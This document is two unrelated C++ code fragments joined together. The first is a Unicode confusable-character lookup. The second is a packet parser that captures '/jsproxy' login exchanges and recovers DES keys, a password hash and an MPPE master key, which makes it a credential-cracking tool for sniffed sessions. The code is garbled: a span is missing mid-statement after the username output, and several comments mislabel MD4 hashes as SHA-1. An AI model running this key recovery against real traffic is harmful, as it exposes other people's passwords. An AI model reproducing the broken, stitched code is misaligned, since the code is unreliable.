int32_t SpoofData::confusableLookup(UChar32 inChar, UnicodeString &dest) const { // Perform a binary search. // [lo, hi), i.e lo is inclusive, hi is exclusive. // The result after the loop will be in lo. int32_t lo = 0; int32_t hi = length(); do { int32_t mid = (lo + hi) / 2; if (codePointAt(mid) > inChar) { hi = mid; } else if (codePointAt(mid) < inChar) { lo = mid; } else { // Found result. Break early. lo = mid; break; } } while (hi - lo > 1); // Did we find an entry? If not, the char maps to itself. if (codePointAt(lo) != inChar) { dest.append(inChar); return 1; } // Add the element to the string builder and return. return appendValueTo(lo, dest); }
void SessionParser::parse(const boost::uint8_t* p_data, boost::uint16_t p_length, boost::uint32_t p_srcAddr) { switch(m_state) { case k_none: if (p_length > 13 && memcmp(p_data, "POST /jsproxy", 13) == 0) { std::cout << "[+] Initial request found." << std::endl; m_state = k_request; } break; case k_request: if (p_length > 17 && memcmp(p_data, "HTTP/1.1 200 OK\r\n", 17) == 0) { std::cout << "[+] Server challenge received." << std::endl; m_serverAddress = p_srcAddr; std::string packet; packet.assign(reinterpret_cast<const char*>(p_data), p_length); if (moveToPayload(packet) && packet.length() > 32) { std::size_t index = 0; for (std::size_t i = 0; i < 24 && index < packet.length(); i++) { if (i < 8) { codePointAt(packet, index); } else { m_rchallenge.push_back(codePointAt(packet, index)); } } } m_state = k_challenge; } break; case k_challenge: { if (p_length < 13 || memcmp(p_data, "POST /jsproxy", 13) != 0) { break; } std::cout << "[+] Challenge response found." << std::endl; m_state = k_done; std::string packet; packet.assign(reinterpret_cast<const char*>(p_data), p_length); if (!moveToPayload(packet)) { std::cerr << "Failed to find the payload." << std::endl; break; } std::size_t index = 0; for (std::size_t i = 0; i < 26; i++) { codePointAt(packet, index); } m_lchallenge.assign(packet.data() + index, 16); index += 16; for (std::size_t i = 0; i < 8; i++) { codePointAt(packet, index); } for (std::size_t i = 0; i < 8 && index < packet.length(); i++) { m_response1.push_back(codePointAt(packet, index)); } for (std::size_t i = 0; i < 8 && index < packet.length(); i++) { m_response2.push_back(codePointAt(packet, index)); } for (std::size_t i = 0; i < 8 && index < packet.length(); i++) { m_response3.push_back(codePointAt(packet, index)); } m_response.assign(m_response1); m_response.append(m_response2); m_response.append(m_response3); m_username.assign(packet.data() + index, packet.length() - index); std::cout << "Username: "******"Failed to recover key3!" << std::endl; return; } std::cout << "DES Key 3: "; printHexString(key3, true); // guess des key 2 std::string key2; if (!getKey2(key2, m_response2, challengeHash)) { std::cerr << "Failed to recover key2!" << std::endl; return; } std::cout << "DES Key 2: "; printHexString(key2, true); // guess des key 1 std::string key1; if (!getKey1(key1, m_response1, challengeHash)) { std::cerr << "Failed to recover key1!" << std::endl; return; } std::cout << "DES Key 1: "; printHexString(key1, true); // retrieve the pwdhash from our 3 keys std::string pwdHash(makePwdHash(key1)); pwdHash.append(makePwdHash(key2)); pwdHash.append(makePwdHash(key3)); pwdHash.resize(16); std::cout << "Password SHA-1: "; printHexString(pwdHash); // create the pwd hash hash for master key creation std::string pwdHashHash(MD4::md4(pwdHash)); std::cout << "SHA-1(Password SHA-1): "; printHexString(pwdHashHash); // create the master key std::string masterKey(pwdHashHash); masterKey.append(m_response); masterKey.append("This is the MPPE Master Key"); unsigned char sharesult[20] = { 0 }; sha1::calc(masterKey.data(), masterKey.size(), sharesult); masterKey.assign((char*)sharesult, 16); std::cout<< "Master Key: "; printHexString(masterKey); } break; case k_challenge_response: case k_decrypt: case k_done: default: break; } }